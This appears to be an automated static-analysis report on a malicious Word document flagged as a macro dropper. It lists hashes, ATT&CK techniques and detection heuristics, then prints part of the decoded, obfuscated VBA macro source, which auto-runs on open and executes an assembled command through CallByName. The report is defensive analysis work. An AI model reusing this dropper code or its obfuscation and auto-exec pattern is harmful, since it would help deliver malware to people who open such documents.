Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1a3a4c1e3f700508…

MALICIOUS

Office (OLE)

Size: 68.0 KB
Created: 2018-05-29 17:55:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 58f835ab7d724de9cbd051f7660e516c
SHA-1: 4ee4b4e56eb72b0372e2b39a9271813387382d07
SHA-256: 1a3a4c1e3f700508b7b6ee919de1ceb0d95204ae9202b4a7bd14c08c4c394916
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is triggered upon opening, and it uses 'CreateObject' and 'CallByName' to execute code. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', indicating a lure to bypass security. The VBA script appears to be obfuscated but contains calls that likely lead to downloading and executing a second-stage payload, potentially via PowerShell, and establishing persistence through a Run key. The ClamAV detection 'Doc.Dropper.Agent-6564663-0' further supports its role as a dropper.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6564663-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6564663-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    CallByName call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium] (SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8633 bytes
SHA-256: e911048736175917cca1fac494f56351469833f43254e83b04d9cb2242178f21

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
theeyamt
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Sub


Attribute VB_Name = "aota0616"
Function plathovc(avehsiahc, October1821)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
plathovc = moneyalpha(nosnebib.giannnisss) + avehsiahc + moneyalpha(VEHCIRTAP.grimmasa) + _
 October1821 + moneyalpha(nosnebib.ruptmanc + nosnebib.voin2007) + October1821
End Function

Function hotfriday()
hotfriday = vogonehcloK.chinesebao
End Function

Function rufexwob()
rufexwob = "lgcua/gEmaQRa[o[ilE.]/"
End Function

Sub civeshoc(Drake269)
honeywarez = "Run"
gantcirc = 0
glennboots = True
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
CallByName Drake269, honeywarez, VbMethod, nosnebib.besstirp, gantcirc, glennboots
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Sub

Function calperf1()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
calperf1 = surfabc1232.saptrotb
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function straggling(unixbill)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
straggling = moneyalpha(rufexwob + surfabc1232.bondgone) + unixbill + _
moneyalpha(surfabc1232.icqelvis) + unixbill + moneyalpha(vogonehcloK.cpvo2391)
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function lumeyres()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
If 1 = 2 Then
MsgBox "Hello"
End If
lumeyres = nosnebib.dreamcat
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function lakers4321(onomonom, gyppi105, AVONIHCTEV, tigresnake)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
If 1 = 2 Then
MsgBox "Hello"
End If
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
nosnebib.besstirp = plathovc(onomonom, gyppi105) + igaymiirP(onomonom, AVONIHCTEV) + straggling(tigresnake)
End Function


Attribute VB_Name = "clysmgog"
Function jiadouu1()
jiadouu1 = vogonehcloK.runisala
End Function

Function tempenny(adamflash As String, nilanereP As Integer) As String
Dim golfhector As Integer
golfhector = 0
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
For maurice301 = 1 To 90
If (HIKSVONIGOL(jiadouu1, maurice301) = adamflash) Then
   golfhector = maurice301
   avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
    Exit For
End If
Next maurice301
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
golfhector = IIf(golfhector - nilanereP <= 0, 90 + golfhector - nilanereP, golfhector - nilanereP)
tempenny = HIKSVONIGOL(jiadouu1, golfhector)
End Function





Attribute VB_Name = "menonaes"
Function igaymiirP(safendbl, johnsnuffy)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
igaymiirP = moneyalpha(VEHCIRTAP.voknespak) + johnsnuffy + moneyalpha(VEHCIRTAP.antoGolos4) + _
johnsnuffy + moneyalpha(VEHCIRTAP.arktaherok) + safendbl + _
moneyalpha(surfabc1232.ozofameh + dealtrid + surfabc1232.crookque) + safendbl + moneyalpha(surfabc1232.ozofameh)
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function

Function dealtrid()
dealtrid = "Q]h]a/sh]macal]mgEmaQRa[o[ilE.]/"
End Function

Function indianlo()
indianlo = deskjet7
End Function

Function deskjet7()
deskjet7 = moneyalpha(surfabc1232.daiserau)
End Function

Function FEBRUARY1786()
FEBRUARY1786 = nosnebib.wethbate
End Function


Attribute VB_Name = "nosnebib"
Attribute VB_Base = "0{3C42E643-BB3D-42D5-8EA4-1FE88B3FFDDE}{924002AB-064C-469B-BF5F-EBD201444C73}"
Attribute VB_GlobalNameSpace = False
Attribute V
... (truncated)